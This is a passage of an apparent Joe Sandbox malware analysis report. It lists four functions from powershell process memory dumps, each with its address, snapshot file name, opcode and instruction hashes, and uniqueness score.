                                    Function 00007FFE7E9856B0 Relevance: .1, Instructions: 73COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1437399587.00007FFE7E980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E980000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffe7e980000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 94b5a8efea5998f4e3b1f787e32a6399781a74b3b19664ca931c0e7fc4d63492
                                    • Instruction ID: 0150bb082d084130cfc55e82c88a79a5f6e9cb5d51b40aa5d3a87dec27091a44
                                    • Opcode Fuzzy Hash: 94b5a8efea5998f4e3b1f787e32a6399781a74b3b19664ca931c0e7fc4d63492
                                    • Instruction Fuzzy Hash: 0321295686F7C16FD35343781C695A67FB8AE03224B1C40EBD0E88A0B3E80C181AC3A3
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00007FFE7E8B3945 Relevance: .0, Instructions: 49COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1436780418.00007FFE7E8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E8B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffe7e8b0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                    • Instruction ID: 06ebab12bdcb369ede310e39e3572e2b90b197151d5f7cd1311bc6972edf6e38
                                    • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                    • Instruction Fuzzy Hash: 5301A73111CB0C4FDB44EF0CE051AA5B3E0FB85320F10052EE58AC3661D636E881CB41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00007FFE7E9843E7 Relevance: .0, Instructions: 48COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1437399587.00007FFE7E980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E980000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffe7e980000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8cf37f1001ea9183cbf170e593f45ead347191a11acadaa5ce53a53d6c492d71
                                    • Instruction ID: 48c62c7b00133a9d208d47d9ade2586046c39fd21caecb89c11b2ec12775fb18
                                    • Opcode Fuzzy Hash: 8cf37f1001ea9183cbf170e593f45ead347191a11acadaa5ce53a53d6c492d71
                                    • Instruction Fuzzy Hash: 81016232A2C9494FEB88DB1C9454AB973E3FF88315B5801B5E05DC36B6CE39EC408780
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00007FFE7E984430 Relevance: .0, Instructions: 32COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1437399587.00007FFE7E980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E980000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffe7e980000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 97d9bb80a13f3a8fbde7b38aefece5955150d47f5bdbd22cc2d3eeee02580206
                                    • Instruction ID: c59a9e785dbb8d61271e3f91eb669973c0696271258a9ec2f71bbf97b8848a20
                                    • Opcode Fuzzy Hash: 97d9bb80a13f3a8fbde7b38aefece5955150d47f5bdbd22cc2d3eeee02580206
                                    • Instruction Fuzzy Hash: CCF01C32A289198FEB94EB5CD4459E8B3F2FF48315B5801B6E01DC7671DA39EC41C780
                                    Uniqueness

                                    Uniqueness Score: -1.00%